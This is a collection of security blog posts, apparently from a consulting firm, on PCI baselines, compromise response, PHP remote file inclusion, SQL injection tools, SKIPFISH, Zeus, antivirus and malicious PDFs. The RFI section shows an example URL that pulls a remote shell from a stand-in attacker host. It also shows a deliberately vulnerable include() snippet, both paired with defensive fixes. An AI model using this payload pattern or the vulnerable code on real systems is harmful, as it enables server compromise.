The Media Makes PCI Compliance “Best Defense”?

I have seen a lot of hype in my day, but this one is not even funny. Below is a link to a mainstream trade magazine for the hospitality industry in which the claim is made that PCI compliance is the “best defense” hotels and the like have against attackers and data theft.

Link: http://is.gd/cgoTz

Now, I agree that hospitality folks should be PCI compliant, since they meet the requirements by taking credit cards, but setting PCI DSS as the goal is bad enough. Making PCI out to be the “best defense” is pretty ridiculous.

PCI DSS and other standards are called security BASELINES for a reason. That is, they are the base of a good security program: the MINIMUM set of practices deemed acceptable to protect information. However, in almost all cases, there is a severe gap between the minimum requirements for protecting data and what I would call the “best defense”. There are so many gaps between PCI DSS as a baseline and a “best defense” that it would take pages and pages to enumerate them. As an initial stab, just consider these items from our 80/20 approach to infosec that are left out of PCI: formalized risk assessment (unless you count the SAQ or the work of the QSA), data flow modeling for data other than credit card information, threat modeling, egress controls, awareness, incident response team formation and even skills gap/training for your security team.

My main problem with PCI is not the DSS itself, but how it is quickly becoming the goal for organizations instead of the starting line. When you set minimums and enforce them with a hammer, they quickly come to be viewed as the be-all, end-all of the process and the point at which the pain goes away so you can focus on other things. This is a very dangerous position, indeed. Partial security is very costly and, at least in my opinion, doing the minimum is pretty far away from being the “best defense”.

Responding to a Compromised System Alert

Thanks to the data from the HITME, I interact with a lot of people and organizations that have compromised machines. Often, my email or phone call is the first they have heard of the problem. Reactions vary from shock and denial to acceptance and occasionally rage. Even worse, when they hear that their machines are attacking others or being used in active attacks, many have no idea how to handle the situation.

Should you ever get a call like this from me or someone else, here are a few tips that you might find helpful for proceeding.

1. Be polite. I am calling to help you. Even though my message may mean more work and possibly some pain for you and your staff, knowing about a compromise is MUCH better than not knowing. Usually, the nicer and more polite you are, the more information I will share to help you understand the issue. I can usually point you in the right direction to begin your investigation, but if you act like a jerk, I will likely leave you to it.

2. Begin an investigation as soon as possible. Invoke your incident response process. If you don’t have one, ask for help or retain assistance. But, please, give immediate attention to a caller who explains and demonstrates that you have a system compromise. I see hundreds of compromised systems a day, and I don’t have time to beg and plead with you to reduce your risk and the risk your systems present to others. I am happy to substantiate my claims, but after I notify you, TAKE ACTION. The majority of compromised systems we send notifications about remain under attacker control for extended periods; often, weeks and months pass before any apparent action (such as mitigation or clean-up) takes place.

3. Do a thorough job of mitigation. I would say that more than 25% of the time (I just started formally tracking this to gather better metrics), when a site goes through “clean up,” it ends up compromised again and right back where it started. Likely, many of these machines are simply bot-infected, and the bots just place their malware back on the system after the “clean up” is done. Removing the basic tag files or malware without understanding how they got there in the first place, and fixing that underlying problem, is pretty much meaningless. For example, I have been working with a site recently that has been used as a PHP RFI verification tag file host for weeks. They have “cleaned up” every day for several weeks to no avail. Every night, they get hit by another PHP RFI scanner that exploits their system and drops a new tag or malware bot. I have tried explaining, no fewer than 10 times, that they need to identify the underlying PHP issue and harden the PHP environment (yeah, I sent them the settings), but nothing has changed. This is an example of how to fail at risk, threat and vulnerability management. Don’t do it. Fix the real problems. If you don’t know how, ask, and then follow the guidance provided. If you need more help, either retain it or get a scanner and start hardening.

4. Respect the law. Don’t beg me not to turn this over to law enforcement. I have to. I even want to if you are critical infrastructure or some other member of the high-threat club. If you’re a member of that club, fix your stuff and manage security appropriately, or be prepared to explain to law enforcement why you didn’t. Either way, I am going to try to help you and everyone else by making the report.

5. List a contact for security issues on your site. Please, when I do call, I need to know who to talk to. At the very least, let your reception folks know how to handle security calls. The last thing you want is for the attacker to continue to compromise your systems while I play in “Voicemail-Land” forever. Remember, help me help you.

Lastly, even if you don’t get this call, do your due diligence. Make sure that your systems are secure and that you have security processes in place. Retain someone to help you manage risk and perform validation. Work with them to create effective risk management techniques for your organization. Hopefully, you won’t be on the other end of the line tomorrow or the next day as I make my round of calls….

If you have any additional suggestions or comments on this approach, please feel free to drop a comment below. As always, thanks for reading and be careful out there.

Understanding PHP RFI Vulnerabilities

PHP is a scripting language that is deployed on countless web servers and used in many web frameworks. “PHP is a widely-used general-purpose scripting language that is especially suited for Web development and can be embedded into HTML.”[1] In 2007, at least 20 million websites had PHP deployed. Much of PHP’s exponential growth came from the development of LAMP/WAMP stacks, which stand for Linux/Apache/MySQL/PHP and Windows/Apache/MySQL/PHP, respectively.

These stacks make deploying PHP applications simple enough for even the most novice web developer. Many of you may have heard of WordPress, Drupal, or Joomla; these common web applications are written entirely in PHP. Many large sites, such as YouTube, Facebook, Digg, and Wikipedia, also run PHP as their main scripting language.

PHP also powers cybercrime. A large majority of publicly disclosed vulnerabilities are PHP-related; in 2009 alone, 5,733 PHP Remote File Inclusion vulnerabilities were disclosed.[2] In situations where exploiting PHP RFI is possible, SQL injection and cross-site scripting are most likely possible as well, because these exploits share the same root cause: a lack of input validation.

What is a PHP Remote File Inclusion (RFI) attack? A PHP RFI attack occurs when unvalidated input is passed to a PHP script, allowing a malicious person to inject PHP code. For example, a typical PHP URL would look something like this:

www.example.com/errors.php?error=errorsfile.php

How can this be abused to cause PHP RFI? The errors.php script takes a file as input; in the example, that file is errorsfile.php. If the site is vulnerable and does not perform input validation, any file could be used as input, even files from remote servers. When the vulnerable server processes www.example.com/errors.php?error=http://evilhaxor.com/remoteshell.php, the remoteshell.php file will be fetched and executed by the web server. Attackers can do quite a bit with remotely included PHP files, including opening a shell, enumerating users or programs, and defacing the website. Basically, an attacker can run commands as whatever user the web server runs as.
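To make the mechanics concrete, here is a minimal sketch of the vulnerable pattern described above. The file and parameter names simply mirror the example URL and are purely illustrative:

    <?php
    // errors.php -- a deliberately vulnerable sketch, for illustration only.
    // The 'error' parameter flows straight into include() with no validation,
    // so a request like ?error=http://evilhaxor.com/remoteshell.php causes
    // the attacker's PHP file to be fetched and executed by the web server
    // (when the configuration permits remote includes).
    include($_GET['error']);
    ?>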

How do we fix PHP RFI? There are several variables within the PHP configuration that can be set to provide a more secure environment for PHP code to run in: register_globals, allow_url_fopen, and allow_url_include. In an ideal world, we would set all of these variables to Off in the php.ini file. However, in many cases this will break applications that depend on these features, so a thorough review of their usage should be done before turning any of them off. The other part of the solution is to follow secure coding practices in PHP and to implement input validation.
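For reference, the settings mentioned above would look like this in php.ini (again, review your applications first, since some legitimately depend on these features):

    ; php.ini hardening for the directives discussed above
    register_globals  = Off
    allow_url_fopen   = Off
    allow_url_include = Off

And here is a minimal sketch of the input validation approach, using a whitelist so that only known-good files can ever reach include(). The file names are illustrative:

    <?php
    // Map expected input values to known-good local files; anything else
    // falls back to a safe default instead of reaching include().
    $allowed = array(
        'errorsfile' => 'errorsfile.php',
        'notfound'   => 'notfound.php',
    );
    $key = isset($_GET['error']) ? $_GET['error'] : 'errorsfile';
    if (!array_key_exists($key, $allowed)) {
        $key = 'errorsfile';
    }
    include(dirname(__FILE__) . '/' . $allowed[$key]);
    ?>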

Detailing input validation methods and ways to securely code PHP is too complex for this article. However, you can discover more by reading the OWASP Top 10 entries for PHP RFI and the Web Application Security Consortium article on PHP RFI. Both will help you learn about this threat and take precautions for your own network.

SQL Injection Tools in the Field

As the Internet continues to morph, common attack vectors change. Info Sec professionals once had the ease of scanning a network and leveraging available vulnerabilities to gain a foothold; now we’re seeing a paradigm shift toward web applications and the security that protects them. I’m sure this is nothing new to our readers! We all see the application as an emerging favorite for gaining access to the network, just as we’re seeing the web browser gain popularity as a way of targeting the end user and workstation.

As our Team continues to provide top-notch application assessment services, we’re seeing SQL injection (SQLi) as one major vector to take advantage of. Unfortunately, testing for this attack is quite time-consuming, considering the various ways developers code their queries, the architecture involved, and how the application handles interactions with the database. In an effort to be more efficient in the quest for vulnerable query strings, we have aggressively tested the plethora of SQLi tools that have been publicly released. Initially, the Team hoped to evaluate these tools and provide an extensive review of the performance of each. This tech is sad to report that of the three tools tested recently, not one was successful in the endeavor.

After some discussion, the Team concluded there are simply too many variables in play for one tool to serve as “the silver bullet.” The language and structure of the queries are just two of the challenges these tools face when sniffing out vulnerable SQL strings. With so many variables for attackers and penetration testers to overcome, SQL injection testing has become extremely difficult to automate reliably! That being said, it appears these tools are created for use in such specific circumstances that they’re rendered useless for anything but that one specialized scenario. So we’re continuing to find this to be a long, drawn-out, manual process. This is not a complaint; our Team loves the challenge! It’s just difficult to find a SQLi tool that can adapt to uses other than the one for which it was specifically created, which is a common source of frustration when trying to expedite the process and finding little success.
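To illustrate why automation struggles, consider two functionally similar but structurally different vulnerable queries; a tool tuned to detect one pattern can easily miss the other. The code below is a hypothetical sketch, not taken from any application we tested:

    <?php
    // Two structurally different ways to build injectable queries:
    // plain string concatenation vs. interpolation via sprintf().
    $q1 = "SELECT * FROM users WHERE name = '" . $_GET['name'] . "'";
    $q2 = sprintf("SELECT * FROM users WHERE id = %s ORDER BY %s",
                  $_GET['id'], $_GET['sort']);
    // The quoted-string context in $q1, the numeric context of 'id',
    // and the ORDER BY context of 'sort' each require different payloads,
    // which is part of why no single tool reliably finds them all.
    ?>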

SKIPFISH Review

This week, our team had the opportunity to test Google’s recently released web application scanner known as SKIPFISH. Touted as an active reconnaissance tool, SKIPFISH claims to present an interactive site map for a targeted site by performing a myriad of recursive crawls and dictionary-based probes. The map is then annotated with the output of several active security checks which are designed to be non-disruptive. SKIPFISH isn’t a replacement for Nessus, Nikto, or any other vulnerability scanner which might own your allegiance. Instead, this tool hopes to supplement your current arsenal.

SKIPFISH boasts high performance: “500+ requests per second against responsive Internet targets, 2000+ requests per second on LAN / MAN networks, and 7000+ requests against local instances have been observed, with a very modest CPU, network, and memory footprint.” To that end, the test used for our evaluation saw a total of more than 9 million HTTP requests over 3 days using the default dictionary included with the tool. While this test was conducted, there was no interruption of the target site, although response times did increase dramatically.
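For those who want to try it themselves, a basic scan can be kicked off with something like the line below. Treat this as a sketch: the exact flags and dictionary file names vary between SKIPFISH releases, so check the documentation that ships with your copy:

    ./skipfish -o output_dir -W dictionaries/default.wl http://www.example.com/

Here, -o names the directory where the index.html report described below gets written, and -W points at the wordlist used for the dictionary-based probes.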

The scan results in a huge directory of files that feed into index.html. When opened in a web browser, this report turns out to be easily readable and comes with pointy-clicky goodness, thanks to a plethora of JavaScript (so be sure you allow it to run). The report lists each page that was interrogated during the scan and documents server responses (including errors and successful replies), identifies possible attack vectors (such as password entry fields to brute force), and notes other useful tidbits for each. Following the breakdown by page, SKIPFISH provides a list of document types (HTML, JS, PDF, images, and various text formats) and their URLs. The report closes with an overview of various issues discovered during the scan, complete with severity ratings and the URL of each finding.

All in all, this tool has potential. It’s certainly not going to replace any of the other tools in our web application assessment toolkit, but it is a good supplement and will most likely be added to give us more information going forward. It is very user friendly, despite the time it took to scan the target site with the default dictionary; that in itself tells our team more testing is necessary, not to mention that several options can enhance the functionality of the tool. With the sheer number of exploits and attack vectors available in web applications today, it never hurts to get a different look at an application using a number of tools. And in this tech’s opinion, redundancy is good in that it shows the stability of our findings across the board.

Zeus-bot Gets More Power

Symantec is reporting that the mighty Zeus botnet is gaining new capabilities and powerful new features. Read a summary of their thoughts here.

Among the new features is a focus on Windows 7 and Vista systems, as opposed to XP. Also observed are new mechanisms that randomize file and folder names in an attempt to evade basic detection tools that look for static names and paths.

Even worse for web users, the trojan’s manipulation and information-gathering techniques have been refined, extending its capability to tamper with data flows when the user browses with Firefox in addition to Internet Explorer.

Organizations should note that this trojan has a strong history of credential theft from social networks and other popular sites on the public Internet. Users who reuse the same credentials on these sites from infected machines can expose their work credentials to attackers. Security teams should step up their efforts to make users more aware of how to secure their home and portable systems, what is expected of them in terms of using unique credentials, and other relevant security topics.

It’s quite unlikely that the threat of Zeus and other malware like it will go away soon. Technical controls are lagging well behind in terms of prevention and detection for these threats. That means education, and helping users practice safer computing, is likely to be one of the most powerful options we have to combat them.

A Quick Thought on Windows Anti-Virus

I know that I’ve been spending a lot of time recently talking about Windows antivirus. Often, I am quite disappointed in the effectiveness of most antivirus tools. Many security researchers, along with my own research on the subject, estimate antivirus to be effective less than half of the time. That said, I still believe that antivirus deserves a place on all systems, and I wanted to take a moment to describe the way that I implement antivirus on many of the Windows machines in my life.

Let me start by saying that I have very few Windows machines left in my life. Most of those that I still use on a day-to-day basis are virtual machines for very specific research and testing purposes. I use a pretty basic approach to antivirus on these systems, as they are not usually exposed to general use, uncontrolled traffic or untrusted networks.

However, there are still a few holdout machines that I either use or support for friends and family. On these devices, most of which run Windows, I have begun to use a new approach to antivirus implementation. Thus far, I have been impressed by how effectively the solution keeps the machines relatively virus-free and operating smoothly. So, how do I do it? For starters, I use two different antivirus products. First, I install ClamAV for Windows and configure it for real-time protection. Clam is free software, and so far I have been very impressed with its performance. One of the nicest things about the Clam solution is that it has a fairly light system footprint and doesn’t seem to bog down the system, even while performing real-time protection. Next, I install the Comodo firewall and antivirus solution. This package is pretty nice: it includes not only antivirus but also a pretty effective and useful firewall, and it is free for noncommercial use. On the Comodo antivirus, I disable real-time protection and instead schedule a full antivirus scan every night while my family member is sleeping.
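As a rough sketch of the scheduled-scan half of this setup, Windows’ built-in task scheduler can drive any command-line scanner if your product’s own scheduler doesn’t suit you. The install path and log location below are illustrative, and Comodo’s own GUI scheduler works just as well:

    schtasks /Create /TN "Nightly AV Scan" /SC DAILY /ST 03:00 ^
        /TR "\"C:\Program Files\ClamWin\bin\clamscan.exe\" -r -i C:\ --log=C:\avscan.log"

The -r flag scans recursively, -i reports only infected files, and --log writes the results somewhere you can review them the next morning.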

By combining two different antivirus products, one in real time and the other for periodic ongoing scanning, I seem to have been able to reduce my service call infection rates by about 50%. From an attacker standpoint, a piece of malware would need to be able to evade both products in order to maintain a presence on the system longer than 24 hours. While such an attack is surely plausible, it simply is not the threat pattern that my family’s home personal use machines face. By combining two different products and leveraging each of them in a slightly different way, I have been able to increase the effective defense for my users.

As always, your mileage and paranoia may vary. Certainly, I am not endorsing either of these products. You should choose whatever antivirus products you feel most comfortable with. I simply used these examples as free solutions in a way to illustrate this approach. Thanks for reading, and be careful out there.

McAfee Update Causing System Problems

McAfee’s Anti-Virus update for today (5958 DAT, April 21, 2010) is causing systems to become stuck in an infinite reboot cycle. If your systems have not updated yet, it is highly recommended that you prevent them from doing so: disable automatic updates and any pending update tasks.

The issue comes from the update detecting a false positive, and it appears that only Windows XP SP3 systems are affected. McAfee falsely detects the file C:\WINDOWS\system32\svchost.exe as containing the W32/Wecorl.a virus, and the machine then enters a reboot cycle.

McAfee has released a temporary fix to suppress the false positive. To use the fix with VirusScan Enterprise Console 8.5i or higher, Access Protection must first be disabled by following the knowledge base article here. (An alternate Google cache page is here, as the site is very busy.)

To correct a machine with this issue, follow these steps:

1. Download the EXTRA.DAT file here. (Or from the KB article)
2. Start the affected machine in Safe Mode
3. Copy the EXTRA.DAT file to the following location (see the sketch below):
\Program Files\Common Files\McAfee\Engine
4. Remove svchost.exe from the quarantine.
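For step 3, the copy from a Safe Mode command prompt might look like the following, assuming EXTRA.DAT was downloaded to the root of the C: drive:

    copy C:\EXTRA.DAT "C:\Program Files\Common Files\McAfee\Engine"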

The 80/20 Rule of #Security: Threat Modeling

Threat modeling is a powerful technique that helps characterize higher level threats and separates them into more manageable sub-threats that can be addressed. Threat modeling can help an organization discover the core issue that lies beneath a high level threat, such as a denial of service (DoS).

There are different approaches to threat modeling. One is to examine an existing application; another is to evaluate threats during every stage of the software development lifecycle (SDLC). With our “80/20 Rule of Information Security” project list, we tackle which regulations apply to your company and assess the risks.

For instance, let’s say a regulation requires strong access control measures to be in place. A high-level threat would be a malicious user escalating privileges, which would require the user to bypass the authentication process. With a Risk Management Threat Modeling Project, MSI would analyze the applications to find alternate entry points in order to harden them and ensure that only authorized users have access.

What is important is discovering where threats exist and then developing security solutions to address them. MSI also examines data flow diagrams that chart the system. Once we see the data flows, we can then start looking for vulnerabilities.

We use the STRIDE approach, which stands for Spoofing, Tampering, Repudiation, Information Disclosure, Denial of Service, and Elevation of Privilege. For each category, we carefully examine all of the loopholes that could leave your company’s data exposed. For instance, “spoofing” is pretending to be something you’re not. Many attackers use email to send notices that may look as though they came from a reputable source (like PayPal), but a quick look at the link address would prove otherwise. These attacks now have a name: phishing.

No business wants a Denial of Service. This happens when an attack overloads your server with fake requests so that it crashes the system. MSI’s HoneyPoint Security Server is an excellent way to prevent such attacks from happening.

Tampering attacks can be directed against static data files or network packets. Most developers don’t think about tampering attacks. When reading an XML configuration file, for example, do you carefully check for valid input? Would your program behave badly if that configuration file contained malformed data? These are some of the questions to consider when analyzing for risk.
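As a small, hypothetical sketch of the kind of defensive check those questions point to (PHP is used for consistency with the earlier examples, and the element names are illustrative):

    <?php
    // Defensively load an XML configuration file: fail closed on
    // malformed input, then cast and range-check each value before use.
    libxml_use_internal_errors(true);
    $config = simplexml_load_file('config.xml');
    if ($config === false) {
        error_log('config.xml failed to parse; refusing to start');
        exit(1);
    }
    $timeout = (int) $config->timeout;   // cast away any injected strings
    if ($timeout < 1 || $timeout > 300) {
        $timeout = 30;                   // out-of-range value: use default
    }
    ?>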

MSI can help you achieve a more secure posture. Why not give us a call today?

Pain and Malicious PDFs

The ubiquitous PDF just seems to be everywhere. With all of the recent hype surrounding the variety of exploits that have come to light in the last couple of weeks, many of our customers are asking how to defend against malicious PDF documents. This is both a simple and a complex question.

The simple answer, and of course the least realistic, is to disallow PDFs altogether. However, as you might already suspect, this is nearly impossible in any modern enterprise. A couple of recent polls in customer enterprises showed that even when staff members said they didn’t use PDFs for anything in their day-to-day work, nearly all of them suddenly realized that PDFs were an important part of some process once PDF documents started getting blocked at the perimeter. Not a single client organization has reported success at blocking PDF documents as a blanket solution.

So, if we can’t block something that may be dangerous, we are back to that age-old game of defense in depth: we’re going to need more than one control to protect our organization against this attack vector. Sure, almost everyone has antivirus on their workstations and other systems; however, in this case, most antivirus applications show little success in detecting many malicious PDF attack vectors. The good news is that antivirus is as effective as usual at detecting the second stage of a malicious PDF attack, which usually involves the installation of malware. Some organizations have also started to deploy PDF-specific, heuristic-based solutions in their email scanners, web content scanners, firewalls and IDS/IPS systems. While these technical controls each have varying strengths and weaknesses, when meshed together they do a pretty good job of giving you some detective, and maybe preventative, capability against specific known PDF attack vectors.

Obviously, you want to back up these technical controls with some additional human training, education and awareness. You want users to understand that a PDF can be as dangerous, if not more so, than many other common attachments. Many of the users we have talked to in the last few weeks have been surprised that PDFs could execute remote code or be harmful; it seems that many users trust PDF documents a lot more than they should. Given how many of the new PDF exploits work, it is a good idea to make your users aware that they should pay careful attention to any pop-up messages in the PDF reader, and that if they are unsure about a message, they should seek assistance before accepting or hitting OK/Continue.

Lastly, PDF attacks like the ones currently in circulation continue to show the importance of many of the projects in our 80/20 Rule of Information Security. By leveraging projects such as anomaly detection and enclave computing, organizations can not only reduce the damage that a successful client-side attack can do, but also give themselves a leg up on identifying such attacks, blocking their sources and quarantining their victims. If you would like to discuss some of these approaches, please drop me a line or give us a call.

What approaches to PDF security has your organization found to be effective? If you have a winning strategy or tactic, leave us a comment below. As always, thanks for reading and be careful out there.